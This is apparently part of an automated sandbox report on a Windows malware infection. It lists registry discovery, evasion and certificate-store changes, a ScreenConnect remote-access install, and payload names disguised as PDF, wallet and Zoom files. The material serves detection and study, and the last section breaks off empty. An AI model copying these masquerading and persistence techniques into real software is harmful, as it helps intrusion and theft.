Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\36.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\99999.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\access.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\system.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jij.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
